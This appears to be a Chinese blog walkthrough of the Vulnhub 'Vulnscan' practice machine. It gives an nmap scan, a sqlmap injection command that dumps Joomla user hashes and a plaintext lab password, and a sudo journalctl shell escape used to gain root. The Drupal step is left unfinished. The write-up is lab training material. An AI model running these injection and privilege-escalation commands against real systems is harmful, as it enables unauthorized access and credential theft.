Vulnhub系列--Vulnscan
tragte IP: 192.168.139.136
信息收集
nmap -A 192.168.139.136
开放5个服务,分别为:
- 22: ssh
- 5000: wordpress
- 80: http
- 8081: joomla
- 9001: Drupal
逐个分析漏洞
wordpress
发现存在一个命令执行:
http://fsociety.web:5000/admin-wp/
依据时间发现存在用户名和密码,可以直接登录,反弹shell一直失败
登录后可以得到:
journalctl不需要密码直接root执行,利用方式:https://gtfobins.github.io/gtfobins/journalctl/
使用方式:
sudo /bin/journalctl
!/bin/bash
joomla
发现存在sql注入,直接注入可得用户名和密码:
sqlmap -u "http://192.168.139.136:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users --dump
username | password | |
---|---|---|
joomlaCMS_admin | $2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWee | Fluntence54@armyspy.com |
elliot | $2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy | 5T3e!_M0un7i@N |
可以看到elliot的邮箱就是密码,可以直接登录:
Drupal
版本为7.54,搜索exploit:
Vulnhub系列--Vulnscan相关推荐
- Vulnhub系列:Raven 1
该篇为Vulnhub系列靶机渗透,本次靶机存在4个flag.下面开始我们今天的渗透之旅.Raven靶机有很多种思路,我将对其进行一一整理. 首先进行信息收集,利用arp-scan和nmap,进行靶机的 ...
- VulnHub系列之Lampiao渗透测试
Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 信息收集 首先是ip信息 然后是服务器端口服务等信息 访问80端口 扫描80端口网站 ...
- 【Vulnhub系列】DC1
文章目录 基本信息 实验过程 额外内容 使用CVE2014-3704添加管理账号 另一种查询具有root权限命令的find语句 下载地址:https://www.vulnhub.com/entry/d ...
- Vulnhub系列:FristLeaks
一.配置靶机环境 以往的靶机,本人是在virtual box中,去配置,和vm上的kali进行联动,但是这个靶机需要DHCP,以往的方式可能不太行了,或者可以在virtual box中桥接成统一网卡. ...
- VulnHub系列之Jarbas渗透测试
jarbas 虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/ 信息收集 将下载好的服务器开机后登录不了,不知道ip ,只能将攻击机和服务器置于同一网段 ...
- 【Vulnhub系列】DC3
文章目录 基本信息 实验过程 额外补充 利用php反弹shell 使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com ...
- 『VulnHub系列』Hacker Fest: 2019-Walkthrough
靶机地址 难度:初级+1 靶机描述: The machine was part of my workshop for Hacker Fest 2019 at Prague. Difficulty le ...
- 『VulnHub系列』DC: 9-Walkthrough
靶机地址 难度:中等 靶机发布日期:2019年12月29日 靶机描述:DC-9 is another purposely built vulnerable lab with the intent of ...
- 『VulnHub系列』EnuBox_Mattermost-Walkthrough
靶机地址 难度:初级++ 靶机发布日期:2020年1月6日 靶机描述:Description: The Mattermost chatting system may or may not hold s ...
最新文章
- 【 MATLAB 】norm ( Vector and matrix norms )(向量范数以及矩阵范数)
- java对一个无序列表进行分组
- Python入门100题 | 第067题
- folders默认配置 shell_更改windows默认的User Shell Folders
- 程序员想要设计一门新的编程语言,学习什么语言好,用C/C++合适吗?
- mysql 5.7 升级 8.0_MySQL5.7升级到8.0过程详解
- linux lite 3.6 64bit,Linux Lite 3.6 正式发布:基于 Ubuntu 16.04.3 LTS 打造
- Tomcat项目get请求中参数乱码问题
- iGoogle背后的思考
- C++ 修改图片格式(后缀)
- 保温杯内壁有很多小泡泡
- 自制模仿谷歌搜索UI的网页
- 广西百强正菱集团涉非法吸存 当地银监局介入摸底银行贷款 柳州公安通告正菱集团涉非法集资
- minicom 下载
- Locating //etc/named.conf failed: 报错处理
- 点餐系统-C++实现
- RHCE认证资料2021.8.28
- IPad GoodReader阅读文档实现即点即译取词在线翻译
- 实用的php封装函数
- 动态mfc下调试无法进入mfc源代码的解决方法
热门文章
- python 抓包 scapy udp,python+scapy 抓包與解析
- 关于C#.NET中PerformanceCounter无法从系统备份存储中重建性能计数器设置,错误代码为 5的问题解决
- 小网站 php,王学集:phpwind与中小网站共同成长
- XAML形状转CSS
- wap精武堂源码php_Showgirl武装秀,“精武堂”大奖等你拿!
- Hbase shell命令 基本使用
- 【已解决】mongoose远程连接mongodb,当客户端断开网络重连时报错topology was destoryed...
- Win10开发之UWP控件的隐藏空间
- 我的达梦DCA培训小记
- python爬虫库的常见用法_$python爬虫系列(2)—— requests和BeautifulSoup库的基本用法...